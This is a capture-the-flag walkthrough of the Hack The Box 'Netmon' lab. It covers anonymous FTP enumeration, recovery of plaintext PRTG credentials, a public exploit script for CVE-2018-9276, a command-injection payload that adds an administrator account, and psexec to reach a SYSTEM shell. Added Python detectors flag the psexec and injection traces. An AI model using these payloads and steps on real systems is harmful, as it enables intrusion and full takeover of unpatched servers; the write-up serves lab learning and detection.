Summary

Netmon is an easy Windows box. It can be exploited by enumerating FTP and finding credentials that can be used to authenticate to PRTG, which is running on port 80. Once the credentials are found, a public exploit script can be used (after a small modification) to obtain a SYSTEM shell, or the same result can be achieved manually.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

FTP Anonymous Access

It’s always helpful to check whether FTP has anonymous access enabled. That is the case here: ncftp was used to connect, and from there user.txt can be retrieved, as shown below:

ncftp 10.129.1.126
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.129.1.126...                                                                                                                
Microsoft FTP Service
Logging in...                                                                                                                                
User logged in.
Logged in to 10.129.1.126.                                                                                                                   
ncftp / > ls
inetpub/               Program Files/         .rnd                   Windows/
PerfLogs/              Program Files (x86)/   Users/
ncftp / > cd User
Could not chdir to User: server said: The system cannot find the file specified. 
ncftp / > cd Users
ncftp /Users > ls
Administrator/   Public/
ncftp /Users > cd Public/ 
ncftp /Users/Public > ls
Documents/  Downloads/  Music/      Pictures/   user.txt    Videos/
ncftp /Users/Public > cat user.txt 
dd58[...]

I really recommend ncftp, it’s very easy to use and very effective. Even though we now have user.txt, we still don’t have a shell. When navigating to the webserver, the following homepage is shown:

Exploitation

The default credentials don’t work and brute-forcing the credentials was also not effective. In order to get credentials, you have to read the PRTG documentation, which states that plaintext passwords are stored in a configuration file. This is of interest because the anonymous FTP account seems to have almost full read access to all files on the server. This post describes in which file the credentials are stored. Navigating to that directory shows the following files:

ncftp ...r/PRTG Network Monitor > pwd
  ftp://10.129.1.126/ProgramData/Paessler/PRTG Network Monitor/


ncftp ...r/PRTG Network Monitor > ls -l
[...]
d---------   1 ftpuser  ftpusers            0 Apr 12 14:51 Monitoring Database
----------   1 ftpuser  ftpusers      1189697 Feb 25  2019 PRTG Configuration.dat
----------   1 ftpuser  ftpusers      1189697 Feb 25  2019 PRTG Configuration.old
----------   1 ftpuser  ftpusers      1153755 Jul 14  2018 PRTG Configuration.old.bak
[...]
d---------   1 ftpuser  ftpusers            0 Feb  3  2019 Ticket Database
d---------   1 ftpuser  ftpusers            0 Feb  3  2019 ToDo Database

When reading the *.bak file, you will see it contains the plaintext credentials:

These credentials should allow authentication to the webserver, but they don’t work as-is. This is a slightly annoying part: the password comes from a backup file that was clearly created in 2018 (both the password itself and the file’s creation date show this), while the other configuration files in the listing above date from 2019. When you enter prtgadmin with the password PrTg@dmin2019, you will be authenticated:

Searchsploit finds an authenticated remote code execution exploit script for this:

searchsploit PRTG
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote C | windows/webapps/46527.sh
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS   | windows/webapps/49156.txt
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (D | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting | java/webapps/34108.txt
-------------------------------------------------------- ---------------------------------

Method one: Automated

You will get this error when running the script on Linux systems:

./46527.sh -u http://10.129.1.126 -c "_ga=GA1.4.318851996.1617821649; _gid=GA1.4.1240126346.1618253280; OCTOPUS1813713946=ezExM0Y0OUQxLUFCNzUtNDkxQS1CMDkzLTMxOEVCMDI2MEY4Q30%3D; _gat=1"

bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory

This is because the script was created in a Windows environment (CRLF line endings, hence the ^M after /bin/bash) and copied over to run on a Unix environment. It can be fixed by running:

dos2unix 46527.sh 
dos2unix: converting file 46527.sh to Unix format...

Now you can use the script as follows (make sure to use your own cookies):

./46527.sh -u http://10.129.1.126 -c "_ga=GA1.4.318851996.1617821649; _gid=GA1.4.1240126346.1618253280; OCTOPUS1813713946=ezExM0Y0OUQxLUFCNzUtNDkxQS1CMDkzLTMxOEVCMDI2MEY4Q30%3D; _gat=1"

[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 

[+]#########################################################################[+] 

 [*] file created 
 [*] sending notification wait....

 [*] adding a new user 'pentest' with password 'P3nT3st' 
 [*] sending notification wait....

 [*] adding a user pentest to the administrators group 
 [*] sending notification wait....


 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!

Now there are multiple ways to turn these credentials into a shell. I like to use psexec.py:

python3 /opt/impacket/examples/psexec.py pentest:'P3nT3st!'@10.129.1.126
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.129.1.126.....
[*] Found writable share ADMIN$
[*] Uploading file ApRFyTGQ.exe
[*] Opening SVCManager on 10.129.1.126.....
[*] Creating service Reyb on 10.129.1.126.....
[*] Starting service Reyb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
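From the defender's side, the psexec.py session above leaves a characteristic trace on the target: a service-install event (ID 7045) for a four-letter random service whose binary is an eight-letter random .exe written to the Windows directory via ADMIN$. The following is an added example, not part of the original write-up; the event records are constructed, and the field names are an assumption modelled on the layout of a 7045 event.

```python
import re

# Constructed sample System-log records (Event ID 7045, "A service was
# installed"), modelled on the psexec.py session above: an 8-letter random
# executable dropped via ADMIN$ and started as a 4-letter random service.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Reyb",
     "ImagePath": r"%SystemRoot%\ApRFyTGQ.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "PRTGCoreService",
     "ImagePath": r'"C:\Program Files (x86)\PRTG Network Monitor\PRTG Server.exe"',
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "kQzV",
     "ImagePath": r"C:\Windows\xYtRwQpL.exe", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "Reyb", "ImagePath": "", "AccountName": ""},
]

RANDOM_SERVICE = re.compile(r"^[A-Za-z]{4}$")
# Binary placed directly in the Windows directory (which is what a write to
# the ADMIN$ share gives) with an 8-letter random basename.
RANDOM_BINARY = re.compile(
    r'^"?(?:%systemroot%|[a-z]:\\windows)\\[A-Za-z]{8}\.exe"?$', re.I)

def is_psexec_like(event: dict) -> bool:
    """True when a service-install event matches the impacket psexec pattern."""
    if event.get("EventID") != 7045:
        return False
    return bool(RANDOM_SERVICE.match(event.get("ServiceName", ""))
                and RANDOM_BINARY.match(event.get("ImagePath", ""))
                and event.get("AccountName", "").lower() == "localsystem")

def find_psexec_like_services(events: list) -> list:
    """Return the service names of all events that look like a psexec run."""
    return [e["ServiceName"] for e in events if is_psexec_like(e)]

if __name__ == "__main__":
    for name in find_psexec_like_services(SAMPLE_EVENTS):
        print(f"[!] suspicious service install: {name}")
```

The PRTG core service is a legitimate 7045 event and is not flagged; only the two random-named services are.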

Method two: Manual

This blog post illustrates how to do it manually.
You will have to go to Setup > Account Settings > Notifications. Then add a new notification (the plus symbol), and finally scroll to the bottom and open “Execute Program”:

You can add the following payload to the Parameter field to add an administrative user:

pwned.txt;net user jeroen password /add;net localgroup administrators jeroen /add

Final configuration looks as follows:

This will issue the following POST request:

POST /editsettings HTTP/1.1
Host: 10.129.1.126
[...]

Content-Disposition: form-data; name="address_10"

Demo EXE Notification - OutFile.ps1
-----------------------------174728350230219553953197710489
Content-Disposition: form-data; name="message_10"

pwned.txt;net user jeroen password /add;net localgroup administrators jeroen /add
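The request above is also what a defender can detect on. As an added example (not from the original post), this Python parses a constructed multipart body of the same shape and flags every message_N value (the Execute Program “Parameter” box) that contains shell metacharacters or account-management commands. The delimiter, field names and injected value are taken from the request above; the second, benign notification is constructed.

```python
import re
# Constructed sample: a multipart body modelled on the /editsettings request
# above, with the injected parameter and a second, benign notification.
DELIM = "-----------------------------174728350230219553953197710489"
SAMPLE_BODY = (
    f"{DELIM}\r\n"
    'Content-Disposition: form-data; name="address_10"\r\n\r\n'
    "Demo EXE Notification - OutFile.ps1\r\n"
    f"{DELIM}\r\n"
    'Content-Disposition: form-data; name="message_10"\r\n\r\n'
    "pwned.txt;net user jeroen password /add;"
    "net localgroup administrators jeroen /add\r\n"
    f"{DELIM}\r\n"
    'Content-Disposition: form-data; name="message_11"\r\n\r\n'
    "alerts.txt\r\n"
    f"{DELIM}--\r\n"
)

# Characters that end the intended argument and start another command, and
# the account-management commands the payload above chains behind the file name.
METACHARS = re.compile(r"[;&|`\r\n]")
SUSPECT_CMDS = re.compile(r"\bnet\s+(user|localgroup)\b|\bpowershell\b", re.I)

def parse_multipart(body: str, delim: str = DELIM) -> dict:
    """Return {field_name: value} for a simple multipart/form-data body."""
    fields = {}
    for part in body.split(delim):
        part = part.strip("\r\n")
        if not part or part == "--":       # leading empty chunk / closing "--"
            continue
        headers, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]+)"', headers)
        if m:
            fields[m.group(1)] = value
    return fields

def flag_execute_program_params(body: str, delim: str = DELIM) -> list:
    """Return (field, reason) for every message_N value (the Execute Program
    'Parameter' box) carrying shell metacharacters or suspect commands."""
    findings = []
    for name, value in parse_multipart(body, delim).items():
        if not name.startswith("message_"):
            continue
        reasons = [label for pat, label in ((METACHARS, "shell metacharacter"),
                                            (SUSPECT_CMDS, "account command"))
                   if pat.search(value)]
        if reasons:
            findings.append((name, "; ".join(reasons)))
    return findings
```

Run over the sample body, only message_10 is reported; the same logic applies to a web proxy or IIS log that records POST bodies to /editsettings.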

You will have to click this on the following screen:

Which will show the following message:

Now you can obtain a system shell the same way as shown in the automated method.


Conclusion

I’m not sure how I feel about this box. Finding the credentials in those files was not as straightforward because you really had to dive deep into the documentation to find them, but once you found them the box was very doable. Hope you learned something and enjoyed this writeup!